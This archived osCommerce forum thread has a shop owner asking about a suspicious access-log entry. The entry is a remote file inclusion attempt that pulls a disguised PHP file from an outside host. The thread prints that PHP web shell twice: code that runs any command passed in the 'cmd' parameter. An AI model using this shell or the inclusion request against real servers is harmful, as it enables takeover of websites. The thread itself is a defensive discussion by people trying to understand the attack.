Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Is someone trying to load a virus & or - into my site?


awisdoms

Recommended Posts

Posted

I have a question - I was going through my raw access log and I saw many varations of this through out my log from - 210.99.208.60 - - [01/Jul/2006:09:26:58 -0400] "GET /index.php?cPath=http://www.ecidade.com.br/images/xpl/lila.jpg?&cmd=cat%20bugado HTTP/1.0" 200 43425 "-" "LWP::Simple/5.53" -

 

So I copied the http:// part and it gave me this below - so what are they trying to do in doing this give me a virus?

 

 

<font color="#808080"><br></font><font color="#008000"><center><b><font face="verdana" size="2">CMD</font></b> <font face="verdana" size="2"> - System CoManD<br><br></font></center></font><font face="Verdana" size="1"><font color="#008000"><br>

<b>#</b> CMD PHP : <h1>PHP SHELL</h1><br>

<b>#</b></b></font><br>

<br>

<br>

<hr color="#000000" width=80% height=115px>

<br>

<div align="center">

<table border="1" cellpadding="0" cellspacing="0" width="633" height="17" bordercolorlight="#000080" bordercolordark="#000080">

<tr>

<td width="633" height="17">

<pre><font color="gray" font face="Tahoma" size="2">

<?

// CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )

if (isset($chdir)) @chdir($chdir);

ob_start();

passthru("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");

$output = ob_get_contents();

ob_end_clean();

if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));

?>

</font></pre>

</tr>

</table>

</div>

 

<br>

<hr color="#000000" width=80% height=115px>

<p align="left">

<br>

<b> <font face="Verdana" size="1" color="#008000">PHP SHELL</font></b> <font face="Verdana" size="1" color="#008000"><br><b>

#<a href="mailto:[email protected]">Contact

Us</font></a></b><br><font face="Verdana" size="1" color="#008000"><b>#

:D </b>

</font>

Posted

I dont know. At first I thought that it might be a webcrawler or something but when I loaded the url specified my antivirus went insane.

 

I dont know what it is but I wanted to put this post in to alert people not to try to load the url: http://www.ecidade.com.br/images/xpl/lila.jpg?&cmd=cat%20bugado ://http://www.ecidade.com.br/images/xp...d=cat%20bugado ://http://www.ecidade.com.br/images/xp...d=cat%20bugado ://http://www.ecidade.com.br/images/xp...d=cat%20bugado

 

and that you should scan your drives because that link tried to infect my computer with a trojan.

 

Just a heads up!!

I thought this stuff was gonna be easy!!

BACK IT UP BEFORE YOU JACK IT UP!!!!

Posted

LoL, I could have told you that. all you have to do is read this line of code.

 

<?
// CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
if (isset($chdir)) @chdir($chdir);
ob_start();
passthru("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
$output = ob_get_contents();
ob_end_clean();
if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));
?>

Search the forum and contributions before posting. If that doesn't work, keep looking, then post. The forum is for seeking help and advice NOT for someone to do your work for you. Try to do something on your on, if you are going to run a shop then learn how it works.

Posted

Did you put the xpl directory in /images yourself or did the hackers do that? It seems full of scripts and stuff (hackers stuff? and already for a long time, since April 2005 at least). The server is not set up to not show the listing of the directory when index.html or index.php is missing. This is not good either I think.

Posted

Yeah I kinda figured it was a script by what it states - but I dont know how they can do such a thing???

They dont have access to my server or my site & no I did not put any images in any thing.

 

Oh great on the code - I have zone alarm and nortons and nothing went off for me but I will check thanks.

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...